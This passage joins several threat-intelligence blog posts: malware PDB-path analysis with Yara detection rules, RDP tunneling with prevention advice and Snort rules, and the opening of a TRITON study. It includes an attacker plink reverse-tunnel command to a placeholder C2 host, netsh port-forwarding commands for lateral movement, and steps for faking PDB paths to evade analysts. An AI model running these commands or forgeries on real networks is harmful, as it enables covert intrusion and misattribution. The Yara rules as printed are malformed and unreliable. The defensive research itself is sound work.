In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe out debug artifacts from executables. One stellar example of this is “peupdate” which is designed not only to strip or fabricate the PDB path information, but can also recalculate the checksum, and eliminate Rich headers.  Below we demonstrate use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Anomaly

Families and Groups Observed

Examples

Non-Ascii Characters

008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL
APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT24, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969

I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Multi Path in Single File

AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL

APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495

Single Sample of TRICKBOT:

D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

 

Outside of Debug Section

ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL

APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

 

Nulled Out PDB Paths

HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT

APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

 

 

 

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of these samples below may be results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples are from confirmed malware samples.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

 

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry jokes that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a code spaghetti mess of scripts and signatures, which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on Github being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy of putting full code packages right into the repositories and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
rule PDB_Header_V7
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw ConsoleApplication1.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Or if built at the command line, you could specify /PDBALTPATH which can create a PDB file name that is does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely label their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB files are present, we identified anomalies that help us identify files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Bypassing Network Restrictions Through RDP Tunneling

Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access. When malware is removed from the equation, intrusions become increasingly difficult to detect.

RDPing Against the Rules

Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments. Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts; however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.

Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1.


Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example

Inbound RDP Tunneling

A common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.

Example Plink Executable Command:

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server.


Figure 2: Example of successful RDP tunnel created using Plink


Figure 3: Example of successful port forwarding from the attacker C2 server to the victim

It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility. For example, an attacker’s initial system compromise could have been the result of a payload dropped from a phishing email aimed at establishing a foothold into the environment, while simultaneously extracting credentials to escalate privileges. RDP tunneling into a compromised environment is one of many access methods typically used by attackers to maintain their presence in an environment.

Jump Box Pivoting

Not only is RDP the perfect tool for accessing compromised systems externally, RDP sessions can be daisy chained across multiple systems as a way to move laterally through an environment. FireEye has observed threat actors using the native Windows Network Shell (netsh) command to utilize RDP port forwarding as a way to access newly discovered segmented networks reachable only through an administrative jump box.

Example netsh Port Forwarding Command:

netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport=3389 connectaddress=<DESTINATION IP>

Example Shortened netsh Port Forwarding Command:

netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic being sent from a previously compromised system. The traffic would then be forwarded directly through the jump box to any system on the segmented network using any designated port, including the default RDP port TCP 3389. This type of RDP port forwarding gives threat actors a way to utilize a jump box’s allowed network routes without disrupting legitimate administrators who are using the jump box during an ongoing RDP session. Figure 4 provides an example of RDP lateral movement to a segmented network via an administrative jump box.


Figure 4: Lateral Movement via RDP using a jump box to a segmented network

Prevention and Detection of RDP Tunneling

If RDP is enabled, threat actors have a way to move laterally and maintain presence in the environment through tunneling or port forwarding. To mitigate vulnerability to and detect these types of RDP attacks, organizations should focus on both host-based and network-based prevention and detection mechanisms. For additional information see the FireEye blog post on establishing a baseline for remote desktop protocol.

Host-Based Prevention:

  • Remote Desktop Service: Disable the remote desktop service on all end-user workstations and systems for which the service is not required for remote connectivity.
  • Host-based Firewalls: Enable host-based firewall rules that explicitly deny inbound RDP connections.
  • Local Accounts: Prevent the use of RDP using local accounts on workstations by enabling the “Deny log on through Remote Desktop Services” security setting.

Host-Based Detection:

Registry Keys:

  • Review registry keys associated with Plink connections that can be abused by RDP session tunneling to identify unique source and destination systems. By default, both PuTTY and Plink store session information and previously connected ssh servers in the following registry keys on Windows systems:
    • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
    • HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys
  • Similarly, the creation of a PortProxy configuration with netsh is stored with the following Windows registry key:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
  • Collecting and reviewing these registry keys can identify both legitimate SSH and unexpected tunneling activity. Additional review may be needed to confirm the purpose of each artifact.

Event Logs:

  • Review event logs for high-fidelity logon events. Common RDP logon events are contained in the following event logs on Windows systems:
    • %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx
    • %systemroot%\Windows\System32\winevt\Logs\Security.evtx
  • The “TerminalServices-LocalSessionManager” log contains successful interactive local or remote logon events as identified by EID 21 and successful reconnection of a previously established RDP session not terminated by a proper user logout as identified by EID 25. The “Security” log contains successful Type 10 remote interactive logons (RDP) as identified by EID 4624. A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389.

Review your artifacts of execution for “plink.exe” file execution. Note that attackers can rename the file name to avoid detection. Relevant artifacts include, but are not limited to:

  • Application Compatibility Cache/Shimcache
  • Amcache
  • Jump Lists
  • Prefetch
  • Service Events
  • CCM Recently Used Apps from the WMI repository
  • Registry keys

Network-Based Prevention:

  • Remote Connectivity: Where RDP is required for connectivity, enforce the connection to be initiated from a designated jump box or centralized management server.
  • Domain Accounts: Employ the “Deny log on through Remote Desktop Services” security setting for privileged accounts (e.g. domain administrators) and service accounts, as these types of accounts are commonly used by threat actors to laterally move to sensitive systems in an environment.

Network-Based Detection:

  • Firewall Rules: Review existing firewall rules to identify areas of vulnerability to port forwarding. In addition to the potential use of port forwarding, monitoring for internal communications between workstations in the environment should be conducted. Generally, workstations do not have a need to communicate with one another directly and Firewall rules can be used to prevent any such communication, except where needed.
  • Network Traffic: Perform content inspection of network traffic. Not all traffic communicating on a given port is what it appears to be. For example, threat actors may use TCP ports 80 or 443 to establish an RDP tunnel with a remote server. Deep inspection of the network traffic can likely reveal that it is not actually HTTP or HTTPS, but entirely different traffic all together. Therefore, organizations should closely monitor their network traffic.
  • Snort Rules: The main indicator of tunneled RDP occurs when the RDP handshake has a designated low source port generally used for another protocol. Figure 5 provides two sample Snort rules that can help security teams identify RDP tunneling in their network traffic by identifying designated low source ports generally used for other protocols.

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

Figure 5: Sample Snort Rules to identify RDP tunneling

Conclusion

RDP enables IT environments to offer freedom and interoperability to users. But with more and more threat actors using RDP to move laterally across networks with limited segmentation, security teams are being challenged to decipher between legitimate and malicious RDP traffic. Therefore, adequate host-based and network-based prevention and detection methods should be taken to actively monitor for and be able to identify malicious RDP usage.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at the TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates by UDP over port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

